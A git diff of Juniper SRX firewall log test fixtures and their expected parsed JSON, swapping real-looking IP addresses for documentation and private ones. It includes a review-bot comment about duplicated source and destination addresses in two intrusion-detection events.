peer-session-id=\"0\" peer-source-address=\"0.0.0.0\" peer-source-port=\"0\" peer-destination-address=\"0.0.0.0\" peer-destination-port=\"0\" hostname=\"NA NA\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]", + "ingested": "2021-12-10T10:15:58.025488600Z", + "original": "\u003c14\u003e1 2020-07-13T16:43:05.041Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@67.43.156.15 reason=\"idle Timeout\" source-address=\"10.1.1.100\" source-port=\"64720\" destination-address=\"67.43.156.15\" destination-port=\"8883\" connection-tag=\"0\" service-name=\"None\" nat-source-address=\"172.19.34.100\" nat-source-port=\"24519\" 
nat-destination-address=\"67.43.156.15\" nat-destination-port=\"8883\" nat-connection-tag=\"0\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"6\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"3851\" packets-from-client=\"161\" bytes-from-client=\"9530\" packets-from-server=\"96\" bytes-from-server=\"9670\" elapsed-time=\"23755\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/1.0\" encrypted=\"UNKNOWN\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\" secure-web-proxy-session-type=\"NA\" peer-session-id=\"0\" peer-source-address=\"0.0.0.0\" peer-source-port=\"0\" peer-destination-address=\"0.0.0.0\" peer-destination-port=\"0\" hostname=\"NA NA\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]", "risk_score": 1.0, "kind": "event", "start": "2020-07-13T16:43:05.041Z", @@ -3023,7 +2770,7 @@ "port": 53 }, "port": 53, - "ip": "175.16.199.1" + "ip": "67.43.156.15" }, "log": { "level": "informational" @@ -3031,22 +2778,22 @@ "destination": { "nat": { "port": 53, - "ip": "175.16.199.1" + "ip": "67.43.156.15" }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 53, - "ip": "175.16.199.1" + "ip": "67.43.156.15" }, "rule": { "name": "default-permit" 
@@ -3054,25 +2801,10 @@
 "source": {
 "nat": {
 "port": 30838,
- "ip": "175.16.199.1"
- },
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-WA",
- "city_name": "Milton",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Washington",
- "location": {
- "lon": -122.3149,
- "lat": 47.2513
- }
- },
- "as": {
- "number": 209
+ "ip": "172.19.34.100"
 },
 "port": 49583,
- "ip": "216.160.83.57"
+ "ip": "10.1.1.100"
 },
 "juniper": {
 "srx": {
@@ -3113,8 +2845,9 @@
 },
 "related": {
 "ip": [
- "216.160.83.57",
- "175.16.199.1"
+ "10.1.1.100",
+ "67.43.156.15",
+ "172.19.34.100"
 ]
 },
 "client": {
@@ -3122,12 +2855,12 @@ "port": 30838 }, "port": 49583, - "ip": "216.160.83.57" + "ip": "10.1.1.100" }, "event": { "severity": 14, - "ingested": "2021-11-25T09:37:16.715491618Z", - "original": "\u003c14\u003e1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2636.1.1.1.2.129 source-address=\"216.160.83.57\" source-port=\"49583\" destination-address=\"175.16.199.1\" destination-port=\"53\" connection-tag=\"0\" service-name=\"junos-dns-udp\" nat-source-address=\"175.16.199.1\" nat-source-port=\"30838\" nat-destination-address=\"175.16.199.1\" nat-destination-port=\"53\" nat-connection-tag=\"0\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"15399\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"ge-0/0/1.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]", + "ingested": "2021-12-10T10:15:58.025492900Z", + "original": "\u003c14\u003e1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CREATE [junos@67.43.156.15 source-address=\"10.1.1.100\" source-port=\"49583\" destination-address=\"67.43.156.15\" destination-port=\"53\" connection-tag=\"0\" service-name=\"junos-dns-udp\" nat-source-address=\"172.19.34.100\" nat-source-port=\"30838\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"53\" nat-connection-tag=\"0\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"15399\" username=\"N/A\" roles=\"N/A\" 
packet-incoming-interface=\"ge-0/0/1.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\" application-category=\"N/A\" application-sub-category=\"N/A\" application-risk=\"1\" application-characteristics=\"N/A\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]", "risk_score": 1.0, "kind": "event", "action": "flow_started", @@ -3150,7 +2883,7 @@ "port": 53, "bytes": 82, "packets": 1, - "ip": "175.16.199.1" + "ip": "67.43.156.15" }, "log": { "level": "informational" @@ -3158,24 +2891,24 @@ "destination": { "nat": { "port": 53, - "ip": "175.16.199.1" + "ip": "67.43.156.15" }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-22", - "city_name": "Changchun", - "country_iso_code": "CN", - "country_name": "China", - "region_name": "Jilin Sheng", + "country_name": "Bhutan", "location": { - "lon": 125.3228, - "lat": 43.88 - } + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "port": 53, "bytes": 82, - "packets": 1, - "ip": "175.16.199.1" + "ip": "67.43.156.15", + "packets": 1 }, "rule": { "name": "default-permit" @@ -3183,27 +2916,12 @@ "source": { "nat": { "port": 26764, - "ip": "175.16.199.1" - }, - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Milton", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", - "location": { - "lon": -122.3149, - "lat": 47.2513 - } - }, - "as": { - "number": 209 + "ip": "172.19.34.100" }, "port": 63381, "bytes": 66, - "ip": "216.160.83.57", - "packets": 1 + "packets": 1, + "ip": "10.1.1.100" }, "juniper": { "srx": { @@ -3248,8 +2966,9 @@ }, "related": { "ip": [ - "216.160.83.57", - "175.16.199.1" + "10.1.1.100", + "67.43.156.15", + "172.19.34.100" ] }, "client": { 
@@ -3259,13 +2978,13 @@ "port": 63381, "bytes": 66, "packets": 1, - "ip": "216.160.83.57" + "ip": "10.1.1.100" }, "event": { "duration": 3000000000, "severity": 14, - "ingested": "2021-11-25T09:37:16.715495475Z", - "original": "\u003c14\u003e1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@2636.1.1.1.2.129 reason=\"Closed by junos-alg\" source-address=\"216.160.83.57\" source-port=\"63381\" destination-address=\"175.16.199.1\" destination-port=\"53\" service-name=\"junos-dns-udp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"175.16.199.1\" nat-source-port=\"26764\" nat-destination-address=\"175.16.199.1\" nat-destination-port=\"53\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"15361\" packets-from-client=\"1\" bytes-from-client=\"66\" packets-from-server=\"1\" bytes-from-server=\"82\" elapsed-time=\"3\" username=\"N/A\" roles=\"N/A\" encrypted=\"No\" profile-name=\"N/A\" rule-name=\"N/A\" routing-instance=\"default\" destination-interface-name=\"ge-0/0/0.0\" uplink-incoming-interface-name=\"N/A\" uplink-tx-bytes=\"0\" uplink-rx-bytes=\"0\" category=\"N/A\" sub-category=\"N/A\" apbr-policy-name=\"N/A\" multipath-rule-name=\"N/A\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]", + "ingested": "2021-12-10T10:15:58.025497400Z", + "original": "\u003c14\u003e1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@67.43.156.15 reason=\"Closed by junos-alg\" source-address=\"10.1.1.100\" source-port=\"63381\" destination-address=\"67.43.156.15\" destination-port=\"53\" service-name=\"junos-dns-udp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"172.19.34.100\" nat-source-port=\"26764\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"53\" src-nat-rule-name=\"our-nat-rule\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" 
policy-name=\"default-permit\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"15361\" packets-from-client=\"1\" bytes-from-client=\"66\" packets-from-server=\"1\" bytes-from-server=\"82\" elapsed-time=\"3\" username=\"N/A\" roles=\"N/A\" encrypted=\"No\" profile-name=\"N/A\" rule-name=\"N/A\" routing-instance=\"default\" destination-interface-name=\"ge-0/0/0.0\" uplink-incoming-interface-name=\"N/A\" uplink-tx-bytes=\"0\" uplink-rx-bytes=\"0\" category=\"N/A\" sub-category=\"N/A\" apbr-policy-name=\"N/A\" multipath-rule-name=\"N/A\" src-vrf-grp=\"N/A\" dst-vrf-grp=\"N/A\"]", "kind": "event", "start": "2020-07-13T16:12:05.530Z", "action": "flow_close", diff --git a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-idp.log b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-idp.log index dbbdd8bbf3a..a6c9f8f71b0 100644 --- a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-idp.log +++ b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-idp.log 
@@ -1,7 +1,7 @@ -<165>1 2020-03-02T23:13:03.193Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.28 epoch-time="1583190783" message-type="SIG" source-address="1.128.3.4" source-port="12345" destination-address="175.16.199.1" destination-port="123" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="3" rulebase-name="IPS" policy-name="Recommended" export-id="20175" repeat-count="0" action="DROP" threat-severity="HIGH" attack-name="HTTP:MISC:GENERIC-DIR-TRAVERSAL" nat-source-address="0.0.0.0" nat-source-port="13312" nat-destination-address="216.160.83.57" nat-destination-port="9757" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="UNTRUST" source-interface-name="reth1.24" destination-zone-name="DMZ" destination-interface-name="reth2.21" packet-log-id="0" alert="no" username="unknown-user" roles="N/A" index="cnm" type="idp" message="-"] -<165>1 2020-03-02T23:13:03.197Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.28 epoch-time="1583190783" message-type="SIG" source-address="1.128.3.4" source-port="12345" destination-address="175.16.199.1" destination-port="123" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="3" rulebase-name="IPS" policy-name="Recommended" export-id="20175" repeat-count="0" action="DROP" threat-severity="CRITICAL" attack-name="TCP:C2S:AMBIG:C2S-SYN-DATA" nat-source-address="0.0.0.0" nat-source-port="13312" nat-destination-address="216.160.83.57" nat-destination-port="9757" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="UNTRUST" source-interface-name="reth1.24" destination-zone-name="DMZ" destination-interface-name="reth2.21" packet-log-id="0" alert="no" username="unknown-user" roles="N/A" index="cnm" type="idp" message="-"] -<165>1 2007-02-15T09:17:15.719Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.135 epoch-time="1507845354" 
message-type="SIG" source-address="1.128.3.4" source-port="45610" destination-address="175.16.199.1" destination-port="80" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="9" rulebase-name="IPS" policy-name="Recommended" export-id="15229" repeat-count="0" action="DROP" threat-severity="HIGH" attack-name="TROJAN:ZMEU-BOT-SCAN" nat-source-address="0.0.0.0" nat-source-port="0" nat-destination-address="216.160.83.57" nat-destination-port="0" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="sec-zone-name-internet" source-interface-name="reth0.11" destination-zone-name="dst-sec-zone1-outside" destination-interface-name="reth1.1" packet-log-id="0" alert="no" username="N/A" roles="N/A" message="-"] -<165>1 2017-10-13T08:55:55.792+11:00 idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.135 epoch-time="1507845354" message-type="SIG" source-address="1.128.3.4" source-port="45610" destination-address="175.16.199.1" destination-port="80" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="9" rulebase-name="IPS" policy-name="Recommended" export-id="15229" repeat-count="0" action="DROP" threat-severity="HIGH" attack-name="TROJAN:ZMEU-BOT-SCAN" nat-source-address="0.0.0.0" nat-source-port="0" nat-destination-address="216.160.83.57" nat-destination-port="0" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="sec-zone-name-internet" source-interface-name="reth0.11" destination-zone-name="dst-sec-zone1-outside" destination-interface-name="reth1.1" packet-log-id="0" alert="no" username="N/A" roles="N/A" message="-"] -<165>1 2011-10-23T02:06:26.544 SRX34001 RT_IDP - IDP_APPDDOS_APP_STATE_EVENT [junos@2636.1.1.1.2.35 epoch-time="1319367986" ddos-application-name="Webserver" destination-zone-name="untrust" destination-interface-name="reth0.0" destination-address="175.16.199.1" destination-port="80" 
protocol-name="TCP" service-name="HTTP" rule-name="1" rulebase-name="DDOS" policy-name="A DoS-Webserver" repeat-count="0" message="Connection rate exceeded limit 60" context-value="N/A"] -<165>1 2011-10-23T16:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT [junos@2636.1.1.1.2.35 epoch-time="1319419711" ddos-application-name="Webserver" source-zone-name="trust" source-interface-name="reth1.O" source-address="1.128.3.4" source-port="50825" destination-zone-name="untrust" destination-interface-name="reth0.0" destination-address="175.16.199.1" destination-port="80" protocol-name="TCP" service-name="HTTP" rule-name="1" ruleebase-name="DDOS" policy-name="AppDoS-Webserver" repeat-count="0" action="NONE" threat-severity="INFO" connection-hit-rate="30" context-name="http-get-url" context-hit-rate="123" context-value-hit-rate="0" time-scope="PEER" time-count="3" time-period="60" context-value="N/A"] -<165>1 2012-10-23T17:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT_LS [junos@2636.1.1.1.2.35 epoch-time="1419419711" ddos-application-name="Webserver" source-zone-name="trust" source-interface-name="reth3.0" source-address="1.128.3.4" source-port="50825" destination-zone-name="untrust" destination-interface-name="reth0.1" destination-address="175.16.199.1" destination-port="80" protocol-name="TCP" service-name="HTTP" rule-name="1" ruleebase-name="DDOS02" policy-name="AppDoS-Webserver" repeat-count="0" action="NONE" threat-severity="INFO" connection-hit-rate="30" context-name="http-get-url" context-hit-rate="123" context-value-hit-rate="0" time-scope="PEER" time-count="3" time-period="60" context-value="N/A"] +<165>1 2020-03-02T23:13:03.193Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time="1583190783" message-type="SIG" source-address="10.11.11.1" source-port="12345" destination-address="67.43.156.13" destination-port="123" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="3" rulebase-name="IPS" 
policy-name="Recommended" export-id="20175" repeat-count="0" action="DROP" threat-severity="HIGH" attack-name="HTTP:MISC:GENERIC-DIR-TRAVERSAL" nat-source-address="0.0.0.0" nat-source-port="13312" nat-destination-address="67.43.156.15" nat-destination-port="9757" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="UNTRUST" source-interface-name="reth1.24" destination-zone-name="DMZ" destination-interface-name="reth2.21" packet-log-id="0" alert="no" username="unknown-user" roles="N/A" index="cnm" type="idp" message="-"] +<165>1 2020-03-02T23:13:03.197Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time="1583190783" message-type="SIG" source-address="10.11.11.1" source-port="12345" destination-address="67.43.156.13" destination-port="123" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="3" rulebase-name="IPS" policy-name="Recommended" export-id="20175" repeat-count="0" action="DROP" threat-severity="CRITICAL" attack-name="TCP:C2S:AMBIG:C2S-SYN-DATA" nat-source-address="0.0.0.0" nat-source-port="13312" nat-destination-address="67.43.156.15" nat-destination-port="9757" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="UNTRUST" source-interface-name="reth1.24" destination-zone-name="DMZ" destination-interface-name="reth2.21" packet-log-id="0" alert="no" username="unknown-user" roles="N/A" index="cnm" type="idp" message="-"] +<165>1 2007-02-15T09:17:15.719Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time="1507845354" message-type="SIG" source-address="67.43.156.14" source-port="45610" destination-address="67.43.156.14" destination-port="80" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="9" rulebase-name="IPS" policy-name="Recommended" export-id="15229" repeat-count="0" action="DROP" threat-severity="HIGH" attack-name="TROJAN:ZMEU-BOT-SCAN" 
nat-source-address="0.0.0.0" nat-source-port="0" nat-destination-address="172.19.13.11" nat-destination-port="0" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="sec-zone-name-internet" source-interface-name="reth0.11" destination-zone-name="dst-sec-zone1-outside" destination-interface-name="reth1.1" packet-log-id="0" alert="no" username="N/A" roles="N/A" message="-"] +<165>1 2017-10-13T08:55:55.792+11:00 idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time="1507845354" message-type="SIG" source-address="67.43.156.14" source-port="45610" destination-address="67.43.156.14" destination-port="80" protocol-name="TCP" service-name="SERVICE_IDP" application-name="HTTP" rule-name="9" rulebase-name="IPS" policy-name="Recommended" export-id="15229" repeat-count="0" action="DROP" threat-severity="HIGH" attack-name="TROJAN:ZMEU-BOT-SCAN" nat-source-address="0.0.0.0" nat-source-port="0" nat-destination-address="172.16.1.10" nat-destination-port="0" elapsed-time="0" inbound-bytes="0" outbound-bytes="0" inbound-packets="0" outbound-packets="0" source-zone-name="sec-zone-name-internet" source-interface-name="reth0.11" destination-zone-name="dst-sec-zone1-outside" destination-interface-name="reth1.1" packet-log-id="0" alert="no" username="N/A" roles="N/A" message="-"] +<165>1 2011-10-23T02:06:26.544 SRX34001 RT_IDP - IDP_APPDDOS_APP_STATE_EVENT [junos@67.43.156.15 epoch-time="1319367986" ddos-application-name="Webserver" destination-zone-name="untrust" destination-interface-name="reth0.0" destination-address="172.27.14.203" destination-port="80" protocol-name="TCP" service-name="HTTP" rule-name="1" rulebase-name="DDOS" policy-name="A DoS-Webserver" repeat-count="0" message="Connection rate exceeded limit 60" context-value="N/A"] +<165>1 2011-10-23T16:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT [junos@67.43.156.15 epoch-time="1319419711" ddos-application-name="Webserver" 
source-zone-name="trust" source-interface-name="reth1.O" source-address="192.168.14.214" source-port="50825" destination-zone-name="untrust" destination-interface-name="reth0.0" destination-address="172.27.14.203" destination-port="80" protocol-name="TCP" service-name="HTTP" rule-name="1" ruleebase-name="DDOS" policy-name="AppDoS-Webserver" repeat-count="0" action="NONE" threat-severity="INFO" connection-hit-rate="30" context-name="http-get-url" context-hit-rate="123" context-value-hit-rate="0" time-scope="PEER" time-count="3" time-period="60" context-value="N/A"] +<165>1 2012-10-23T17:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT_LS [junos@67.43.156.15 epoch-time="1419419711" ddos-application-name="Webserver" source-zone-name="trust" source-interface-name="reth3.0" source-address="192.168.14.214" source-port="50825" destination-zone-name="untrust" destination-interface-name="reth0.1" destination-address="172.30.20.201" destination-port="80" protocol-name="TCP" service-name="HTTP" rule-name="1" ruleebase-name="DDOS02" policy-name="AppDoS-Webserver" repeat-count="0" action="NONE" threat-severity="INFO" connection-hit-rate="30" context-name="http-get-url" context-hit-rate="123" context-value-hit-rate="0" time-scope="PEER" time-count="3" time-period="60" context-value="N/A"] diff --git a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-idp.log-expected.json b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-idp.log-expected.json index 1b7e7e00b8b..e7d9267de68 100644 --- a/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-idp.log-expected.json +++ b/packages/juniper_srx/data_stream/log/_dev/test/pipeline/test-idp.log-expected.json @@ -8,7 +8,7 @@ "port": 123, "bytes": 0, "packets": 0, - "ip": "175.16.199.1" + "ip": "67.43.156.13" }, "log": { "level": "notification" 
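Review bot: The third and fourth rewritten lines (the two `TROJAN:ZMEU-BOT-SCAN` events) now use `67.43.156.14` for both `source-address` and `destination-address`, so the expected output for these events shrinks `related.ip` from four entries to three (hunks `@@ -343,10 +343,9 @@` and `@@ -464,10 +463,9 @@` in the expected file) and the test no longer shows source and destination being carried into `related.ip` as distinct values. The old fixture deliberately used different addresses for the two sides, and the first two lines of this hunk still do. Suggest giving the source a different documentation address, e.g. `source-address="67.43.156.13"`, on both lines and regenerating the expected file so the de-duplication case does not silently replace the distinct-address case.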
@@ -16,12 +16,12 @@ "destination": { "nat": { "port": 9757, - "ip": "216.160.83.57" + "ip": "67.43.156.15" }, "port": 123, "bytes": 0, "packets": 0, - "ip": "175.16.199.1" + "ip": "67.43.156.13" }, "rule": { "name": "IPS", @@ -38,7 +38,7 @@ }, "bytes": 0, "packets": 0, - "ip": "1.128.3.4" + "ip": "10.11.11.1" }, "juniper": { "srx": { @@ -93,10 +93,10 @@ "unknown-user" ], "ip": [ - "1.128.3.4", - "175.16.199.1", + "10.11.11.1", + "67.43.156.13", "0.0.0.0", - "216.160.83.57" + "67.43.156.15" ] }, "client": { 
@@ -106,13 +106,13 @@ "port": 12345, "bytes": 0, "packets": 0, - "ip": "1.128.3.4" + "ip": "10.11.11.1" }, "event": { "duration": 0, "severity": 165, - "ingested": "2021-11-25T09:37:26.894198951Z", - "original": "\u003c165\u003e1 2020-03-02T23:13:03.193Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.28 epoch-time=\"1583190783\" message-type=\"SIG\" source-address=\"1.128.3.4\" source-port=\"12345\" destination-address=\"175.16.199.1\" destination-port=\"123\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"3\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"20175\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"HIGH\" attack-name=\"HTTP:MISC:GENERIC-DIR-TRAVERSAL\" nat-source-address=\"0.0.0.0\" nat-source-port=\"13312\" nat-destination-address=\"216.160.83.57\" nat-destination-port=\"9757\" elapsed-time=\"0\" inbound-bytes=\"0\" outbound-bytes=\"0\" inbound-packets=\"0\" outbound-packets=\"0\" source-zone-name=\"UNTRUST\" source-interface-name=\"reth1.24\" destination-zone-name=\"DMZ\" destination-interface-name=\"reth2.21\" packet-log-id=\"0\" alert=\"no\" username=\"unknown-user\" roles=\"N/A\" index=\"cnm\" type=\"idp\" message=\"-\"]", + "ingested": "2021-12-09T13:40:54.976980500Z", + "original": "\u003c165\u003e1 2020-03-02T23:13:03.193Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time=\"1583190783\" message-type=\"SIG\" source-address=\"10.11.11.1\" source-port=\"12345\" destination-address=\"67.43.156.13\" destination-port=\"123\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"3\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"20175\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"HIGH\" attack-name=\"HTTP:MISC:GENERIC-DIR-TRAVERSAL\" nat-source-address=\"0.0.0.0\" nat-source-port=\"13312\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"9757\" elapsed-time=\"0\" inbound-bytes=\"0\" 
outbound-bytes=\"0\" inbound-packets=\"0\" outbound-packets=\"0\" source-zone-name=\"UNTRUST\" source-interface-name=\"reth1.24\" destination-zone-name=\"DMZ\" destination-interface-name=\"reth2.21\" packet-log-id=\"0\" alert=\"no\" username=\"unknown-user\" roles=\"N/A\" index=\"cnm\" type=\"idp\" message=\"-\"]", "kind": "alert", "start": "2020-03-02T23:13:03.193Z", "action": "security_threat", @@ -137,7 +137,7 @@ "port": 123, "bytes": 0, "packets": 0, - "ip": "175.16.199.1" + "ip": "67.43.156.13" }, "log": { "level": "notification" @@ -145,12 +145,12 @@ "destination": { "nat": { "port": 9757, - "ip": "216.160.83.57" + "ip": "67.43.156.15" }, "port": 123, "bytes": 0, "packets": 0, - "ip": "175.16.199.1" + "ip": "67.43.156.13" }, "rule": { "name": "IPS", @@ -167,7 +167,7 @@ }, "bytes": 0, "packets": 0, - "ip": "1.128.3.4" + "ip": "10.11.11.1" }, "juniper": { "srx": { @@ -222,10 +222,10 @@ "unknown-user" ], "ip": [ - "1.128.3.4", - "175.16.199.1", + "10.11.11.1", + "67.43.156.13", "0.0.0.0", - "216.160.83.57" + "67.43.156.15" ] }, "client": { 
@@ -235,13 +235,13 @@ "port": 12345, "bytes": 0, "packets": 0, - "ip": "1.128.3.4" + "ip": "10.11.11.1" }, "event": { "duration": 0, "severity": 165, - "ingested": "2021-11-25T09:37:26.894216604Z", - "original": "\u003c165\u003e1 2020-03-02T23:13:03.197Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@2636.1.1.1.2.28 epoch-time=\"1583190783\" message-type=\"SIG\" source-address=\"1.128.3.4\" source-port=\"12345\" destination-address=\"175.16.199.1\" destination-port=\"123\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"3\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"20175\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"CRITICAL\" attack-name=\"TCP:C2S:AMBIG:C2S-SYN-DATA\" nat-source-address=\"0.0.0.0\" nat-source-port=\"13312\" nat-destination-address=\"216.160.83.57\" nat-destination-port=\"9757\" elapsed-time=\"0\" inbound-bytes=\"0\" outbound-bytes=\"0\" inbound-packets=\"0\" outbound-packets=\"0\" source-zone-name=\"UNTRUST\" source-interface-name=\"reth1.24\" destination-zone-name=\"DMZ\" destination-interface-name=\"reth2.21\" packet-log-id=\"0\" alert=\"no\" username=\"unknown-user\" roles=\"N/A\" index=\"cnm\" type=\"idp\" message=\"-\"]", + "ingested": "2021-12-09T13:40:54.976990100Z", + "original": "\u003c165\u003e1 2020-03-02T23:13:03.197Z idp1 RT_IDP - IDP_ATTACK_LOG_EVENT [junos@67.43.156.15 epoch-time=\"1583190783\" message-type=\"SIG\" source-address=\"10.11.11.1\" source-port=\"12345\" destination-address=\"67.43.156.13\" destination-port=\"123\" protocol-name=\"TCP\" service-name=\"SERVICE_IDP\" application-name=\"HTTP\" rule-name=\"3\" rulebase-name=\"IPS\" policy-name=\"Recommended\" export-id=\"20175\" repeat-count=\"0\" action=\"DROP\" threat-severity=\"CRITICAL\" attack-name=\"TCP:C2S:AMBIG:C2S-SYN-DATA\" nat-source-address=\"0.0.0.0\" nat-source-port=\"13312\" nat-destination-address=\"67.43.156.15\" nat-destination-port=\"9757\" elapsed-time=\"0\" inbound-bytes=\"0\" 
outbound-bytes=\"0\" inbound-packets=\"0\" outbound-packets=\"0\" source-zone-name=\"UNTRUST\" source-interface-name=\"reth1.24\" destination-zone-name=\"DMZ\" destination-interface-name=\"reth2.21\" packet-log-id=\"0\" alert=\"no\" username=\"unknown-user\" roles=\"N/A\" index=\"cnm\" type=\"idp\" message=\"-\"]", "kind": "alert", "start": "2020-03-02T23:13:03.197Z", "action": "security_threat", @@ -266,7 +266,7 @@ "port": 80, "bytes": 0, "packets": 0, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "log": { "level": "notification" @@ -274,12 +274,12 @@ "destination": { "nat": { "port": 0, - "ip": "216.160.83.57" + "ip": "172.19.13.11" }, "port": 80, "bytes": 0, "packets": 0, - "ip": "175.16.199.1" + "ip": "67.43.156.14" }, "rule": { "name": "IPS", @@ -293,7 +293,7 @@ "port": 45610, "bytes": 0, "packets": 0, - "ip": "1.128.3.4" + "ip": "67.43.156.14" }, "juniper": { "srx": { @@ -343,10 +343,9 @@ }, "related": { "ip": [ - "1.128.3.4", - "175.16.199.1", + "67.43.156.14", "0.0.0.0", - "216.160.83.57" + "172.19.13.11" ] }, "client": { 
